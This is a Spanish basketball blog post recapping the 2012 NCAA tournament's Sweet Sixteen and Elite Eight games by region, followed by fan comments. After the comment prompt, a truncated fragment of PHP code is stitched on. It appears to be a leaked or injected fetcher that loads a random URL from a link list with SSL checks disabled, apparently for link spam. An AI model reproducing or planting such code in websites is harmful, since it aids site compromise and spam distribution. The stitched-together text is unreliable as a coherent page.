March Madness 2012: Resumen Sweet Sixteen y Elite 8

26 de March de 2012 por txusma

Ya tenemos los 4 equipos que disputarán la Final Four los próximos 31 de Marzo y 1 de Abril en New Orleans. Vamos a conocerlos y a repasar sus partidos del Sweet Sixteen y los Elite 8.

South Regional

Se cumplen los pronóstico y los Kentucky Wildcats se plantan en la Final Four mostrándose más fuertes y más favoritos que nunca. En los Sweet Sixteen se impusieron a los Hoosiers de Indiana en el mejor partido hasta el momento del campeonato y en uno de los más bellos de la historia. Anthony Davis vivió una noche bastante floja y fue superado por Cody Zeller pero Michael Kidd-Gilchtrist apareció para ejercer de líder de un equipo en el que todos sus jugadores aportaron de manera importante. Después de una primera parte jugada de poder a poder en un intercambio de golpes de proporciones no aptas para la NCAA (47-50), Kentucky impuso su mayor talento y físico para acabar venciendo y propinando a Indiana la mayor cantidad de puntos en contra desde 1958 (90-102).

Su rival en los Elite Eight fueron los Bears de Baylor. El equipo de Perry Jones, Quincy Miller y compañía tuvieron muchos más problemas de los previstos para superar a Xavier y eso que a mediados de la primera parte el resultado era de 6-24 para los Bears. A partir de ahí, el buen hacer Mark Lyons, Kenny Frease y Tu Holloway se entonaron para llegar al descanso con solo 7 puntos de desventaja. Con los Musketeers apretando en defensa y Baylor jugando más como equipo y haciendo valer su mayor capacidad reboteadora el partido se rompió a falta de 3 minutos y cayó del lado de los Bears. Perry Jones III estuvo espléndido de cara a canasta (7 de 8 ) pero Quincy Miller estuvo muy, muy flojo. El mejor de Baylor fue Quincy Acy con 20 puntos y 15 rebotes.

El partido entre Baylor y Kentucky se presentaba muy interesante. Los Wildcats eran claro favoritos pero los Bears presentaban varias armas que en caso de funcionar les podían poner en problemas. A la hora de verdad no fue así y a la media parte el partido estaba resuelto (22-44). Michael Kidd-Gilchtrist con 19 puntos (vaya 2 partiditos se ha marcado), Anthony Davis con 18 y 11 rebotes y un Terrence Jones omnipresente (12 puntos, 9 rebotes, 6 asistencias, 2 robos y 3 tapones) dominaron en todo momento a un equipo donde los mejores fueron nuevamente Quincy Acy y Pierre Jackson. En la 2ª parte Baylor plantó cara y en un arrebato de vergüenza torera consigueron encadenar varias canastas y obligar a Calipari a pedir un tiempo muerto. Resultado: exhibición defensiva de los Wildcats y pista libre hacia una nueva Final Four.

West Regional

El rival de los Wildats en el primer partido de la Final Four serán los Louisville Cardinals. Sorpresa relativa porque la West Regional se presentaba más abierta que nunca y sin un equipo considerado ámpliamente como favorito. En los Sweet Sixteen se cargaron a los teóricos números 1, los Spartas de Michigan State. Como se preveía al enfrentarse 2 de las mejores defensas del país, fue un partido trabado y de tanteo bajo. Gorqui Deng, el pívot de los Cardinals, se convirtió en un coloso y con 9 rebotes y 7 tapones se hizo dueño y señor de su zona. Draymond Green y sus compañeros nunca se encontraron cómodos y fueron por detrás prácticamente todo el partido. El alero de los Spartas (una de las sensaciones de la competición) se despidió de la universidad con 13 puntos y 16 rebotes.

Por el otro lado del cuadro llegaban los Florida Gators liderados por Bradley Beal. Con 21 puntos (8 de 10), 6 rebotes, 4 asistencias, 2 robos y 3 tapones se convirtió en el azotes de Marquette que solo plantó cara durante el primer tiempo. Jae Crowder (una de las sorpresas de la March Madnees) entró temprano en problemas de faltas durante la primera parte y tuvo que ver buena parte de ella desde el banco. Sin su mejor hombre, los Golden Eagles se fueron despegando y ya no pudieron remontar en la 2ª parte.

El partido definitivo cayó del lado de los Cardinal por un ajustado margen de 4 puntos. Los Gators empezaron fuertes y tanto Bradley Beal (14-7-4) como Patrick Young (11-6) superaban la defensa de Louisville y encontraban aro con facilidad. Así se llegó al descanso con 8 puntos de ventaja para los Florida. Tras la reanudación todo siguió el mismo guión, con los Gators ametrallando desde el triple y manteniendo una distancia de 10 puntos. Pero a falta de unos 8 minutos a los jugadores de Florida les entró pánico a ganar y se colapsaron totalmente. Hasta el final del partido solo serían capaces de anotar 3 puntos más. Semejante empanada, provocada en parte por la buena defensa de los Cardinals, fue aprovechada por estos para remontar y acabar llevándose el encuentro. Louisville vuelve a la Final Four 7 años después.

East Region

Ohio State se impuso a Syracuse en el duelo decisivo y será el representate de la región en la Final Four. Los Orange ya pasaron muchos problemas para doblegar a Wisconsin en el Sweet Sixteen e incluso pudieron quedar eliminados de acertar Jordan Taylor (17-4-6) un último triple a falta de 3 segundos. Arrancaron bien los Badgers pero Syracuse impuso su juego. Llegaron a ganar de 11 mediado la primera parte pero una serie de errores dejaron la ventaja en solo 3 puntos al descanso. Tras la reanudación se repetió el guión: Syracuse se escapaba mínimamente y los cañoneros de Wisconsin dejaban la diferencia en nada (14 de 27 en triples). Los últimos 4 minutos fueron un compendio de nervios y fallos que acabaron con la victoria por la mínima de Syracuse.

En cambio Buckeyes lo tuvieron algo más fácil. Se les complicaron las cosas ante Cincinnati a mitad de la 2ª parte, en que les remontaron 10 puntos de diferencia y llegaron a ir por detrás en el marcador pero Aaron Craft (ya avisamos que era la clave de este equipo) puso las cosas en su sitio con toda una exhibición defensiva (11 puntos, 4 reboets, 5 asistencias y 6 robos). Jared Sullinger se fue a los 23 puntos y 11 rebotes y DeShaun Thomas a los 26 puntos.

El partido de los Elite Eight parecía complicarse para Ohio State cuando Jared Sullinger provocaba su 2ª falta a los 6 minutos y medio. Por suerte para ellos, Syracuse no estaba acertado en el tiro y pudieron llegar al descanso virtualmente igualados. A partir de ahí la participación de su mejor hombre fue decisiva para abrir hueco y mantenerlo hasta el final de partido ante los arreones de los hombres de Jim Boeheim. Ohio State vuelve a la Final Four después que en 2007 perdiera el título con Greg Oden y Mike Conley en sus filas frente los Gators de Horford y Noah.

Midwest region

En nuestro análisis comentábamos que veíamos a UNC como el máximo rival para los Wildcats para alzarse con el título para también avisábamos de la fortaleza de los Kansas Jayhawks. Finalmente, serán estos últimos los que disputen la Final Four. Ambos equipos se enfrentaban en los Sweet Sixteen a equipos teóricamente muy inferiores, las cenicientas del torneo, pero ambos sudaron de lo lindo. Los Jayhawks consiguieron sobreponerse un día nefasto en el tiro de sus principales figuras (Thomas Robinson, 5 de 15 y Tyshawn Taylor, 2 de 14) para llevarse el partido con una canasta de Elijah Johnson a falta de 13 segundos. El pívot Jeff Whitney colaboró con 10 tapones. Miedo daba entrar en esa zona.

Más todavía tuvieron que sudar los Tar Heels para llevarse el duelo ante Ohio, el peor equipo, sobre el papel, de los que quedan en el cuadro. La baja de Kendall Marshall en la dirección se notó mucho y ni la descomunal actuación de Tyler Zeller (20 puntos y 22 rebotes) ni el acierto exterior de Reggie Bullock (17-10-5) consiguieron despegar a los Bobcats. Un Walter Offut (26 puntos) desatadó consiguió forzar la prórroga y mantener en vilo a todos los aficionados de North Carolina. Pero en la prórroga entró el vértigo a los jugadores de Ohio que se quedaron sin anotar una canasta en juego.

UNC jugó mucho mejor su segundo partido sin Kendall Marshall pero se encontraron con un Tyshawn Taylor al que por fin pudimos ver una gran actuación en el torno (22 puntos, 6 rebotes, 5 asistencias y 5 robos). El partido fue igualado con los Jayhawks siempre un puntito por encima pero con North Carolina recuperando las pequeñas ventajas. A falta de 4 minutos, UNC solo estaba un punto por debajo pero a partir de ahí desapareció. Todos los jugadores de Kansas aportaron en el parcial de 12-0 que cerró el partido y la clasificación del equipo para la Final Four. Thomas Robinson cuajó un buen partido con 18 puntos y 9 rebotes mientras que por UNC James McAdoo fue el mejor con 15 puntos.

Comenta

5 comentarios a esta entrada

  1. JHC dice:
    #1

    que buena pinta tiene este año la final four, muchas estrellas repartidas e impresionante el nivel del draft, uno de los mejores que yo recuerde

      Citar

  2. kantonyo dice:
    #2

    Para los que vais a seguir la Final Four, os recomiendo seguir a uno de los jugadores que mas me han gustado este año, y que no conocía antes del March Madness. El alero de primer año Louisville, Chane Behanan.

    De todas formas coincido con JHC, este año la Final Four está repleta de próximos jugadores de la NBA.

    A ver si vemos un gran espectáculo.

      Citar

  3. melo15 dice:
    #3

    Lo mejor de esta final four es que todas las estrellas estan en la Final Four, no como años anteriores.
    Michael Kidd-Gilchrist es el mejor jugador de este draft!

      Citar

  4. Ru dice:
    #4

    Pues nada finalísima Kentucky (cumpliendo lo previso) vs Kansas (derrotando a Ohio en un partido típico de la Madness,mucha tensión y finales apretados) donde los primeros son claramente favoritos.Yo en esta ocasión pronosticaría que se va a cumplir el guión y no va haber sorpresa.

    Whitney ha sido la sensación de las semifinales,pívot sin fundamentos en ataque pero con una capacidad de intimidación notable,que probablemente no juegue más de 5 minutos por partido si cae en la NBA.Thomas Robinson me gustó muchísimo a pesar del arranque nervioso que tuvo en los primeros compases del partido.

    Esta noche habrá campeón universitario.

      Citar

  5. melo15 dice:
    #5

    Yo creo que Kentucky se va a merendar Kansas, es verdad que seguramente Robinson aguante el tipo frente a Davis, y que incluso le supere,tambien puede ser que Relefort anule a Kidd-Gilchrist, pero Kentucky tiene demasiados jugadores, Terrence Ross, Marcus Teague, Doron Lamb. Todo depende de como respondan los secundarios de Kansas, pero esta muy dificil para los de Kansas City

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>